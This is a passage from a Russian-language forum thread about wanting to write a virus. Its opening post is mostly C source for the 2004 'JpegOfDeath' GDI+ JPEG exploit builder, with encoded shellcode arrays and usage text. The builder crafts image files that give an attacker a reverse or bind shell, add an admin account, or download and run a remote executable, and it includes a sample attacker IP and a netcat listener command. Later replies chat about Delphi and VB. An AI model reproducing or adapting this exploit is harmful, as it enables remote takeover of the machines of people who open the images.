"\x45\x2F\xB2\x97\xB8\x9D\xCB\x63\xFD\x26\xD4\xC6\xD7\x70\xA4\x19"
"\x24\x50\xCA\x46\x2B\xFC\xEB\x3B\xC7\xC9\xA5\x4A\x8F\x69\x26\xDF"
"\x6D\x72\x4A\x9E\x27\x6B\x3E\xE6\x92\x86\x24\x85\x04\xDB\xED\xA9"
"\x64\x8E\x6B\x63\x67\x19\x1A\xA5\xE7\xB8\x28\x3D\x09\xAB\x5D\x5F"
"\x16\xF7\x8C\xED\x49\x4C\xF5\x01\xE6\xE5\xD5\x1C\x49\xAB\x10\x71"
"\xA6\x36\x9B\x93\x24\x61\x00\x0F\x61\xEC\x34\xA7\x9C\x23\xF4\x96"
"\xC6\xE6\xAF\xB7\x80\x76\xEF\x93\xF0\xAA\x28\x8A\x6B\xE0\x18\xC0"
"\xA4\x9B\x7E\x90\x39\x03\xC2\x90\xDC\x43\x31\x91\x62\x91\x86\x23"
"\x35\x35\xA2\x80\x4D\xFA\x72\x31\x07\x9D\x03\x70\xA8\x93\x24\x4F"
"\x89\x51\x83\x5E\xA4\x2E\x7A\xC0\x7D\xA9\x8A\x10\x61\x64\x07\xFA"
"\x88\xC6\x89\x26\xDA\x0F\x20\xBD\xB9\x16\xD2\xA8\xE8\x91\x3F\x1A"
"\xE2\xBA\xF0\xBE\x74\xAB\x1D\xC4\x44\x15\x1A\x8A\x9C\xC7\x2A\x6B"
"\xA3\x33\xB7\x1E\x88\x47\x69\xA9\x64\x68\x26\xC1\x97\x0B\xD6\x86"
"\x8B\x1B\x29\xC6\x87\xE4\xC7\xFD\xCC\x53\x11\xA5\x9C\x62\x6A\xE5"
"\x40\x37\x61\x89\xF6\xB2\x9C\x2A\x7C\xFD\x05\x6A\x30\x5F\x52\x02"
"\xEB\x72\xBF\x7D\x74\x4C\x23\xB9\x8F\xD8\x78\x67\x54\x59\x64\x47"
"\xC5\x75\x21\x18\xD5\xE3\x58\xE1\x72\x63\xBF\x6D\xBD\xCB\xCA\x82"
"\x65\xE7\xDB\x09\x54\x4F\x0D\x95\x86\x76\xE3\xF2\xA0\x48\x82\x55"
"\xD7\xA6\xCE\xA7\xAA\xDC\x6A\xF1\xA9\x8E\xE0\x35\xC1\xCA\xA1\xD4"
"\x93\xD2\xD6\x39\x95\x3C\x6B\x46\x60\xAC\xC1\x3B\x60\xC9\x70\x84"
"\x8E\xA1\x9A\x9A\x20\x01\x94\xCA\x08\x91\x53\xDC\x01\xB1\xB5\x12"
"\x37\x11\xC6\xC1\xAC\xF1\x11\xD4\x9C\x6B\x3E\x69\x76\xF0\x1D\x7B"
"\x52\x6D\xC9\xA8\x66\x94\xBB\x79\x8F\x7E\xDE\x17\xFD\x4D\xAB\x1E"
"\x76\x7A\xA3\x2B\xE2\x50\x06\xB7\x2C\xEB\x2A\x49\xC9\xEA\x4E\x9B"
"\xE7\xCA\xAF\x1E\xEC\x23\xDC\x8B\xE1\x6B\x5F\x1A\x9B\xE8\x49\x2E"
"\x63\xE5\x03\x32\xCD\x19\xB8\x23\x10\x78\x1F\x85\x5C\x15\x8C\x97"
"\x84\x9B\xDB\x15\x35\x9F\x16\xE0\x1E\x86\xB9\x8F\x97\x11\x4E\xDA"
"\x35\x02\x45\x25\x93\xF8\x55\x24\x17\xB9\x1B\xF5\xC8\x07\xA9\xE2"
"\x2A\x76\xB0\xC2\x37\x01\x95\xAD\x81\xB6\x1C\x6A\xA2\x38\xD9\xAE"
"\xCA\x59\x18\x75\x25\xFF\x00\x81\xAE\xD8\xE8\xBB\x47\x62\xAC\xB7"
"\xB6\xA1\x8D\x40\xE3\x86\x65\x6D\x1E\xDB\x89\x2F\x9D\xCD\x6B\x24"
"\x62\x41\x61\x89\xAC\x2D\x8B\x3E\xB6\x68\xC0\x63\x73\x70\x6B\x6B"
"\x6A\xA1\x7A\xAC\x56\xE7\x11\x56\x58\xD4\x13\xA4\x0B\xB6\xEB\xB3"
"\x3B\x47\x22\x95\xD3\x53\x2E\xEA\x19\x86\x96\xF7\x03\x83\x52\x9E"
"\x54\xAB\x6E\x58\x63\x7C\x33\xCE\x93\xB1\x19\x1C\xE9\xDB\xAA\x35"
"\xBF\x46\x8D\xD4\xD2\x56\xE0\xE0\x33\xA1\x4D\x0A\x4E\x3B\xB1\xCD"
"\xD4\x06\x44\x56\x4A\xCD\x24\x26\xEA\x6D\x7A\x87\xDC\x3B\x60\x6D"
"\xFC\x2A\x86\x1B\x97\x36\x6D\x42\x04\xA0\x11\xEE\xE7\x46\x22\x35"
"\xD5\x26\xB0\x1C\x0B\x7C\x69\x5F\x06\xEC\x5A\xC5\x0B\x46\x70\x27"
"\xF2\xD4\x79\xAD\x89\xDA\x30\x74\xBD\x98\xE4\x68\x58\x86\xE4\x1B"
"\x69\xB9\xDC\x2B\x30\x87\x48\x53\xC5\x85\x3B\xDD\x8A\x4E\xB5\x42"
"\xB2\x8C\x6E\x2C\x01\xF8\x56\x04\x7B\xC9\xA3\x05\x4F\xB4\xD5\xA2"
"\xDF\xF6\xFD\xC6\xE2\xA7\x3C\x89\x24\xFE\xA9\x5E\xC3\xD4\x6D\xF7"
"\x85\xC9\x59\x39\x63\x59\x9B\xFF\x00\x06\x1A\x5E\xFA\x69\x0A\x46"
"\x2B\xC0\x9F\xC2\x91\x8B\xC9\x40\x58\x16\xBD\xF2\xC0\xD3\x3B\x7F"
"\x2D\xA9\xBB\x2E\x49\x42\x6D\x52\x70\x39\x62\x9F\x08\x73\x6F\x20"
"\x09\x64\x00\x01\x83\x2B\x00\xD5\x97\xBC\xDC\xF6\x9C\xA7\x66\xEA"
"\xD9\xB6\x9F\xE1\x56\xDE\xBA\xEC\x65\xB4\x44\xD8\xE3\x8D\x52\x2F"
"\x36\xCE\x74\x33\x7E\x9F\x2E\x22\x99\x8B\xC9\x6D\x5A\x6D\x9E\xA8"
"\x22\xC7\x0C\xA8\x62\x3D\x17\x1D\x2F\xC8\xFA\xD4\xB0\x9E\x14\x45"
"\x45\xD5\x6E\x96\x04\xE1\xF1\xA0\x37\x90\x5B\xD8\x7F\x81\x57\x1B"
"\xC8\xD5\x48\x27\x0E\x3C\x6B\x3D\xCD\x44\x15\x92\x41\x25\x94\x82"
"\xAE\x0E\x42\x97\x8D\x8C\x6D\xAE\x56\xB8\x26\xD8\x0F\xE3\x43\x93"
"\x73\x18\x75\x28\xD7\xF8\xD5\xFF\x00\x74\xE4\x18\xC2\x82\xAC\x6F"
"\x86\x7F\x2A\x4C\xBE\xE5\xFC\xD2\x22\xCC\x9A\x32\xD1\x7C\x7D\x68";
char admin_header0[]=
"\xFF\xD8\xFF\xE0\x00\x10\x4A\x46\x49\x46\x00\x01\x02\x00\x00\x64\x00\x60\x00\x00"
"\xFF\xEC\x00\x11\x44\x75\x63\x6B\x79\x00\x01\x00\x04\x00\x00\x00\x0A\x00\x00"
"\xFF\xEE\x00\x0E\x41\x64\x6F\x62\x65\x00\x64\xC0\x00\x00\x00\x01"
;
char admin_header1[]=
"\xFF\xFE\x00\x01"
;
char admin_header2[]=
"\x00\x14\x10\x10\x19\x12\x19\x27\x17\x17\x27\x32"
;
char admin_header3[]=
"\xEB\x0F\x26\x32"
;
char admin_header4[]=
"\xDC\xB1\xE7\x70"
;
char admin_header5[]=
"\x26\x2E\x3E\x35\x35\x35\x35\x35\x3E"
"\xE8\x00\x00\x00\x00\x5B\x8D\x8B"
"\x00\x05\x00\x00\x83\xC3\x12\xC6\x03\x90\x43\x3B\xD9\x75\xF8"
;
char admin_header6[]=
"\x00\x00\x00\xFF\xDB\x00\x43\x00\x08\x06\x06\x07\x06\x05\x08\x07\x07"
"\x07\x09\x09\x08\x0A\x0C\x14\x0D\x0C\x0B\x0B\x0C\x19\x12\x13\x0F\x14"
"\x1D\x1A\x1F\x1E\x1D\x1A\x1C\x1C\x20\x24\x2E\x27\x20\x22\x2C\x23\x1C"
"\x1C\x28\x37\x29\x2C\x30\x31\x34\x34\x34\x1F\x27\x39\x3D\x38\x32\x3C"
"\x2E\x33\x34\x32\xFF\xDB\x00\x43\x01\x09\x09\x09\x0C\x0B\x0C\x18\x0D"
"\x0D\x18\x32\x21\x1C\x21\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
"\x32\x32\x32\x32\x32\xFF\xC0\x00\x11\x08\x00\x03\x00\x03\x03\x01\x22"
"\x00\x02\x11\x01\x03\x11\x01\xFF\xC4\x00\x1F\x00\x00\x01\x05\x01\x01"
"\x01\x01\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x01\x02\x03\x04\x05"
"\x06\x07\x08\x09\x0A\x0B\xFF\xC4\x00\xB5\x10\x00\x02\x01\x03\x03\x02"
"\x04\x03\x05\x05\x04\x04\x00\x00\x01\x7D\x01\x02\x03\x00\x04\x11\x05"
"\x12\x21\x31\x41\x06\x13\x51\x61\x07\x22\x71\x14\x32\x81\x91\xA1\x08"
"\x23\x42\xB1\xC1\x15\x52\xD1\xF0\x24\x33\x62\x72\x82\x09\x0A\x16\x17"
"\x18\x19\x1A\x25\x26\x27\x28\x29\x2A\x34\x35\x36\x37\x38\x39\x3A\x43"
"\x44\x45\x46\x47\x48\x49\x4A\x53\x54\x55\x56\x57\x58\x59\x5A\x63\x64"
"\x65\x66\x67\x68\x69\x6A\x73\x74\x75\x76\x77\x78\x79\x7A\x83\x84\x85"
"\x86\x87\x88\x89\x8A\x92\x93\x94\x95\x96\x97\x98\x99\x9A\xA2\xA3\xA4"
"\xA5\xA6\xA7\xA8\xA9\xAA\xB2\xB3\xB4\xB5\xB6\xB7\xB8\xB9\xBA\xC2\xC3"
"\xC4\xC5\xC6\xC7\xC8\xC9\xCA\xD2\xD3\xD4\xD5\xD6\xD7\xD8\xD9\xDA\xE1"
"\xE2\xE3\xE4\xE5\xE6\xE7\xE8\xE9\xEA\xF1\xF2\xF3\xF4\xF5\xF6\xF7\xF8"
"\xF9\xFA\xFF\xC4\x00\x1F\x01\x00\x03\x01\x01\x01\x01\x01\x01\x01\x01"
"\x01\x00\x00\x00\x00\x00\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0A"
"\x0B\xFF\xC4\x00\xB5\x11\x00\x02\x01\x02\x04\x04\x03\x04\x07\x05\x04"
"\x04\x00\x01\x02\x77\x00\x01\x02\x03\x11\x04\x05\x21\x31\x06\x12\x41"
"\x51\x07\x61\x71\x13\x22\x32\x81\x08\x14\x42\x91\xA1\xB1\xC1\x09\x23"
"\x33\x52\xF0\x15\x62\x72\xD1\x0A\x16\x24\x34\xE1\x25\xF1\x17\x18\x19"
"\x1A\x26\x27\x28\x29\x2A\x35\x36\x37\x38\x39\x3A\x43\x44\x45\x46\x47"
"\x48\x49\x4A\x53\x54\x55\x56\x57\x58\x59\x5A\x63\x64\x65\x66\x67\x68"
"\x69\x6A\x73\x74\x75\x76\x77\x78\x79\x7A\x82\x83\x84\x85\x86\x87\x88"
"\x89\x8A\x92\x93\x94\x95\x96\x97\x98\x99\x9A\xA2\xA3\xA4\xA5\xA6\xA7"
"\xA8\xA9\xAA\xB2\xB3\xB4\xB5\xB6\xB7\xB8\xB9\xBA\xC2\xC3\xC4\xC5\xC6"
"\xC7\xC8\xC9\xCA\xD2\xD3\xD4\xD5\xD6\xD7\xD8\xD9\xDA\xE2\xE3\xE4\xE5"
"\xE6\xE7\xE8\xE9\xEA\xF2\xF3\xF4\xF5\xF6\xF7\xF8\xF9\xFA\xFF\xDA\x00"
"\x0C\x03\x01\x00\x02\x11\x03\x11\x00\x3F\x00\xF9\xFE\x8A\x28\xA0\x0F"
;
// Code…
char newshellcode[2048];
unsigned char xor_data(unsigned char byte)
{
return(byte ^ 0x92);
}
void print_usage(char *prog_name)
{
printf(" Exploit Usage:\n");
printf("\t%s -r your_ip | -b [-p port] <jpeg_filename>\n\n", prog_name);
printf("\t\t\t -a | -d <source_file> <jpeg_filename>\n\n");
printf(" Parameters:\n\n");
printf("\t-r your_ip or -b\t Choose -r for reverse connect attack mode\n\t\t\t\tand choose -b for a bind attack.By default\n\t\t\t\t if you don't specify -r or-b then a bind\n\t\t\t\t attack will be generated.\n\n");
printf("\t-a or -d\t\t The -a flag will create a user X with pass X, \n\t\t\t\t on the admin localgroup. The -d flag,will\n\t\t\t\t execute the source http path of the file\n\t\t\t\t given.\n");
printf("\n\t-p (optional)\t\t This option will allow you to change the port \n\t\t\t\t used for a bind or reverseconnect attack.\n\t\t\t\t If the attack mode is bindthen the\n\t\t\t\t victim will open the -p port. If the attack\n\t\t\t\t modeis reverse connect then the port you\n\t\t\t\t specify will be the one you wantto listen\n\t\t\t\t on so the victim can connect to you\n\t\t\t\t right away.\n\n");
printf(" Examples:\n");printf("\t%s -r 68.6.47.62 -p 8888 test.jpg\n", prog_name);
printf("\t%s -b -p 1542 myjpg.jpg\n", prog_name);
printf("\t%s -a whatever.jpg\n", prog_name);
printf("\t%s -d http://webserver.com/patch.exe exploit.jpg\n\n", prog_name);
printf(" Remember if you use the -r option to have netcat listening\n");
printf(" on the port you are using for the attack so the victim will\n");
printf(" be able to connect to you when exploited…\n\n");
printf(" Example:\n");
printf("\tnc.exe -l -p 8888");
exit(-1);
}
int main(int argc, char *argv[])
{
FILE *fout;
unsigned int i = 0,j = 0;
int raw_num = 0;
unsigned long port = 1337; // default port for bind and reverse attacks
unsigned long encoded_port = 0;
unsigned long encoded_ip = 0;
unsigned char attack_mode = 2; // bind by default
char *p1 = NULL, *p2 = NULL;
char ip_addr[256];
char str_num[16];
char jpeg_filename[256];
WSADATA wsa;
printf(" +————————————————+\n");
printf(" | JpegOfDeath - Remote GDI+ JPEG Remote Exploit |\n");
printf(" | Exploit by John Bissell A.K.A. HighT1mes |\n");
printf(" | TweaKed By M4Z3R For GSO |\n");
printf(" | September, 23, 2004 |\n");
printf(" +————————————————+\n");
if (argc < 2)
print_usage(argv[0]);
// process commandline
for (i = 0; i < (unsigned) argc; i++)
{
if (argv[0] == '-')
{
switch (argv[1])
{
// reverse connect
case 'r':
strncpy(ip_addr, argv[i+1], 20);
attack_mode = 1;
break;
// bind
case 'b':
attack_mode = 2;
break;
// Add.Admin
case 'a':
attack_mode = 3;
break;
// DL
case 'd':
attack_mode = 4;
break;
// port
case 'p':
port = atoi(argv[i+1]);
break;
}
}
}
strncpy(jpeg_filename, argv[i-1], 255);
fout = fopen(argv[i-1], "wb");
if( !fout ) {
printf("Error: JPEG File %s Not Created!\n", argv[i-1]);
return(EXIT_FAILURE);
}
// initialize the socket library
if (WSAStartup(MAKEWORD(1, 1), &wsa) == SOCKET_ERROR) {
printf("Error: Winsock didn't initialize!\n");
exit(-1);
}
encoded_port = htonl(port);
encoded_port += 2;
if (attack_mode == 1)
{
// reverse connect attack
reverse_shellcode[184] = (char) 0x90;
reverse_shellcode[185] = (char) 0x92;
reverse_shellcode[186] = xor_data((char)((encoded_port >> 16) & 0xff));
reverse_shellcode[187] = xor_data((char)((encoded_port >> 24) & 0xff));
p1 = strchr(ip_addr, '.');
strncpy(str_num, ip_addr, p1 - ip_addr);
raw_num = atoi(str_num);
reverse_shellcode[179] = xor_data((char)raw_num);
p2 = strchr(p1+1, '.');
strncpy(str_num, ip_addr + (p1 - ip_addr) + 1, p2 - p1);
raw_num = atoi(str_num);
reverse_shellcode[180] = xor_data((char)raw_num);
p1 = strchr(p2+1, '.');
strncpy(str_num, ip_addr + (p2 - ip_addr) + 1, p1 - p2);
raw_num = atoi(str_num);
reverse_shellcode[181] = xor_data((char)raw_num);
p2 = strrchr(ip_addr, '.');
strncpy(str_num, p2+1, 5);
raw_num = atoi(str_num);
reverse_shellcode[182] = xor_data((char)raw_num);
}
if (attack_mode == 2)
{
// bind attack
bind_shellcode[204] = (char) 0x90;
bind_shellcode[205] = (char) 0x92;
bind_shellcode[191] = xor_data((char)((encoded_port >> 16) & 0xff));
bind_shellcode[192] = xor_data((char)((encoded_port >> 24) & 0xff));
}
if (attack_mode == 4)
{
// Http DL
strcpy(newshellcode,http_shellcode);
strcat(newshellcode,argv[2]);
strcat(newshellcode,"\x01");
}
// build the exploit jpeg
if ( attack_mode != 3)
{
j = sizeof(header1) + sizeof(setNOPs1) + sizeof(header2) - 3;
for(i = 0; i < sizeof(header1) - 1; i++)
fputc(header1, fout);
for(i=0;i<sizeof(setNOPs1)-1;i++)
fputc(setNOPs1, fout);
for(i=0;i<sizeof(header2)-1;i++)
fputc(header2, fout);
for( i = j; i < 0x63c; i++)
fputc(0x90, fout);
j = i;
}
if (attack_mode == 1)
{
for(i = 0; i < sizeof(reverse_shellcode) - 1; i++)
fputc(reverse_shellcode, fout);
}
else if (attack_mode == 2)
{
for(i = 0; i < sizeof(bind_shellcode) - 1; i++)
fputc(bind_shellcode, fout);
}
else if (attack_mode == 4)
{
for(i = 0; i<sizeof(newshellcode) - 1; i++)
{fputc(newshellcode, fout);}
for(i = 0; i< sizeof(admin_shellcode) - 1; i++)
{fputc(admin_shellcode, fout);}
}
else if (attack_mode == 3)
{
for(i = 0; i < sizeof(admin_header0) - 1; i++){fputc(admin_header0, fout);}
for(i = 0; i < sizeof(admin_header1) - 1; i++){fputc(admin_header1, fout);}
for(i = 0; i < sizeof(admin_header2) - 1; i++){fputc(admin_header2, fout);}
for(i = 0; i < sizeof(admin_header3) - 1; i++){fputc(admin_header3, fout);}
for(i = 0; i < sizeof(admin_header4) - 1; i++){fputc(admin_header4, fout);}
for(i = 0; i < sizeof(admin_header5) - 1; i++){fputc(admin_header5, fout);}
for(i = 0; i < sizeof(admin_header6) - 1; i++){fputc(admin_header6, fout);}
for (i = 0; i<1601; i++){fputc('\x41', fout);}
for(i = 0; i < sizeof(admin_shellcode) - 1; i++){fputc(admin_shellcode, fout);}
}
if (attack_mode != 3 )
{
for(i = i + j; i < 0x1000 - sizeof(setNOPs2) + 1; i++)
fputc(0x90, fout);
for( j = 0; i < 0x1000 && j < sizeof(setNOPs2) - 1; i++, j++)
fputc(setNOPs2[j], fout);
}
fprintf(fout, "\xFF\xD9");
fcloseall();
WSACleanup();
printf(" Exploit JPEG file %s has been generated!\n", jpeg_filename);
return(EXIT_SUCCESS);
}
}
vot i virus :) na C++
|
|
|
|
|
RE: хотел бы написать вирус - 2007-08-06 13:06:02.470000
|
|
|
JTG
Сообщений: 1189
Оценки: 0
Присоединился: 2007-03-05 11:56:01.993333
|
Не вирус а эксплойт, причём старый
|
|
|
|
|
RE: хотел бы написать вирус - 2007-08-07 03:58:03.503333
|
|
|
FlipLab Software
Сообщений: 179
Оценки: 0
Присоединился: 2007-02-08 01:50:01.693333
|
Хватит критиковать парня… Вы же все когда то так начинали..))))
http://www.delphiworld.narod.ru/dw.html - тут и статьи, тут и электорнная база на комп по дельфям, там много хорошего найдёшь….
|
|
|
|
|
RE: хотел бы написать вирус - 2007-08-07 08:10:06.623333
|
|
|
Refresh
Сообщений: 606
Оценки: 0
Присоединился: 2006-04-08 20:00:54
|
quote:
ORIGINAL: blacksun
quote:
ORIGINAL: Refresh
Аффтор я бы тебе посоветовал хотя бы VB изучить имхо дальше легче будет!
ВБ отстой, пусть сразу учит асм или С++ .. кто думает, что асм сложный, пусть выпьет йаду
Я конечно не спорю, но его знать тоже полезно, если потребуется быстро создать виндовое приложение то имхо лучше языка не найти, например самый обычный сканер портов можно сделать за 7 минут, а если хочется его усовершенствовать то потрать еще 5 минут и будет тебе Щастье!))
|
|
|
|
|
RE: хотел бы написать вирус - 2007-08-07 12:23:18.940000
|
|
|
JTG
Сообщений: 1189
Оценки: 0
Присоединился: 2007-03-05 11:56:01.993333
|
quote:
например самый обычный сканер портов можно сделать за 7 минут
И будет "Время сканирования обратно пропорционально времени написания"
// (alt+0169) JTG :D
quote:
если потребуется быстро создать виндовое приложение то имхо лучше языка не найти
тоже ИМХО - для быстрого (не значит качественного) написания виндовых приложений делфи вне конкуренции (ну или былдер)
|
|
|
|
|
RE: хотел бы написать вирус - 2007-08-07 13:35:00.023333
|
|
|
Refresh
Сообщений: 606
Оценки: 0
Присоединился: 2006-04-08 20:00:54
|
может быть ….. может быть ) но о вкусах не спорят )
|
|
|
|
|
RE: хотел бы написать вирус - 2007-08-07 23:00:33.496666
|
|
|
Prophet
Сообщений: 22
Оценки: 0
Присоединился: 2007-06-21 23:01:31.233333
|
Начинай с Delphi. Я сам щас пишу на Делфи и вроде норм получается… Если че давайте мыло покажу что нить =)
|
|
|
|
|
|
